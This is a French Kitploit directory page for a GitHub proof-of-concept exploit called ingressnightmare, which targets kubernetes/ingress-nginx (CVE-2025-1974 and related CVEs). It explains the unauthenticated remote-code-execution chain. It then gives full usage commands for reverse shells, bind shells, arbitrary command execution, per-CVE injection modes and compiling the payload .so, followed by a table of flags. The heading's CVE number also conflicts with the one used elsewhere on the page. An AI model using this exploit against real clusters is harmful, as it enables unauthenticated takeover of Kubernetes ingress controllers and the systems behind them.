Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ingressNightmare-CVE-2025-1974-exps — IngressNightmare POC. première mondiale d'exploitation d'exécution à distance non-aveugle avec de multiples méthodes d'exploitation avancées. permet l'exploitation sur disque. CVE-2025-24514 - injection auth-url, CVE-2025-1097 - injection auth-tls-match-cn, CVE-2025-1098 – injection mirror UID -- tous disponibles. | Kitploit
Outils/GitHubGitHub/esonhugh/ingressnightmare-cve-2025-1974-exps
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité CloudRed TeamingDéveloppement de Charges Utiles

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

IngressNightmare POC. première mondiale d'exploitation d'exécution à distance non-aveugle avec de multiples méthodes d'exploitation avancées. permet l'exploitation sur disque. CVE-2025-24514 - injection auth-url, CVE-2025-1097 - injection auth-tls-match-cn, CVE-2025-1098 – injection mirror UID -- tous disponibles.

GitHub
esonhugh/ingressnightmare-cve-2025-1974-exps

ingressNightmare-CVE-2025-1974-exps

Voir le dépôtSite web
971410il y a 1 anVérifié par Kitploit
Partager

Ingress Nightmare CVE-2025-1907

Description

Cette vulnérabilité permet à des attaquants distants d'exécuter du code arbitraire sur les installations affectées de kubernetes/ingress-nginx. L'authentification n'est pas requise pour exploiter cette vulnérabilité. Le défaut spécifique réside dans le traitement des requêtes HTTP.

Il est déclenché par l'envoi de deux requêtes. L'une est une requête longue mise en tampon vers le serveur NGINX du même pod, puis nginx la met en cache comme fichier temporaire. La seconde requête est une requête vers le serveur webhook de validation d'admission, ce qui déclenche l'écriture par le webhook d'admission d'une configuration nginx temporaire contenant la directive ssl_engine badso_location;. Ensuite, le webhook d'admission exécute nginx -t pour vérifier la configuration, ce qui déclenche l'exécution de code à distance dans le contexte du serveur NGINX.

Exploitation

# reverse shell 
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER} 

# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER} 

# blind command execution
./ingressnightmare -m c  -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER} 

# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url 
# same as 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
 
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}

# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid 

## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...

# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload

# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run 
# dump with > /tmp/evil.so

## dry run to lookup raw nginx admission 
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...

## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'

## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}

Groupes de drapeaux

Les options de l'exploit sont si complexes que j'ai dû les regrouper en plusieurs groupes.

[
     // Set Targets Groups
     {
          option: 	"ingress-webhook-url", "i",
          example:	"https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443",
          description:	"ingress webhook url"
     },
     {
         option: 	"upload-url", "u",
         example:	"http://ingress-nginx-controller.ingress-nginx.svc.cluster.local:80",
         description: 	"upload url"
    },

    // Set Exploit Method for which CVE
    {
        option:      "is-auth-url", "a",
        example:     "true",
        description: "CVE-2025-24514: using auth-url to attack (default)"
    },
    {
        option:      "is-match-cn", "A",
        example:     "false",
        description: "CVE-2025-1097: using auth-tls-match-cn to attack (not default)"
    },
    {
        option:      "auth-secret-name", "U",
        example:     "kube-system/cilium-ca",
        description: "if using auth-tls-match-cn, secret name is required, example: kube-system/cilium-ca"
    },
    {
        option:      "is-mirror-with-uid", "M",
        example:     "false",
        description: "CVE-2025-1098: using mirror with uid"
    },

    // Set Exploit Mode for reverse shell / bind shell / command
    {
        option:      "mode", "m",
        example:     "r",
        description: "mode reverse-shell(r)/bind-shell(b)/command(c)"
    },
    {
        option:      "reverse-shell-ip", "r",
        example:     "192.168.1.100",
        description: "reverse shell ip"
    },
    {
        option:      "reverse-shell-port", "p",
        example:     "4444",
        description: "reverse shell port"
    },
    {
        option:      "bind-shell-port", "b",
        example:     "4444",
        description: "bind shell port"
    },
    {
        option:      "command", "c",
        example:     "id",
        description: "command"
    },

    // Debug modes
    {
        option:      "verbose", "v",
        example:     "-vv",
        description: "verbose output (debug is -v ; trace is -vv)"
    },
    {
        option:      "dry-run", "d",
        example:     "true",
        description: "dry run and dump payload"
    },

    // test Only Upload Thread / Only Admission Thread modes
    {
        option:      "only-admission", "o",
        example:     "true",
        description: "only admission"
    },
    {
        option:      "only-admission-file", "f",
        example:     "/path/to/file",
        description: "only admission file"
    },
    {
        option:      "only-upload", "O",
        example:     "true",
        description: "only upload"
    },

    // Set guessed PID and FD ranges
    {
        option:      "pid-range-start", "S",
        example:     "5",
        description: "pid range start"
    },
    {
        option:      "pid-range-end", "E",
        example:     "40",
        description: "distance to pid range end"
    },
    {
        option:      "fd-range-start", "s",
        example:     "3",
        description: "fd range start"
    },
    {
        option:      "fd-range-end", "e",
        example:     "26",
        description: "distance fd range end"
    },

    // Advanced Payload: custom so file or json template
    {
        option:      "so", "",
        example:     "/path/to/custom.so",
        description: "custom so file exploit, if u get Exec format error, please recompile the so file from c code. ps: execute `./ingressnightmare show-c` to get source code"
    },
    {
        option:      "validate-json-template", "t",
        example:     "template.json",
        description: "validate json template, using foobar as placeholder to filepath"
    }
]

https://github.com/user-attachments/assets/415d6b81-b907-4aaa-bd99-18640bd64b2b

Théorie

Télécharger l’outil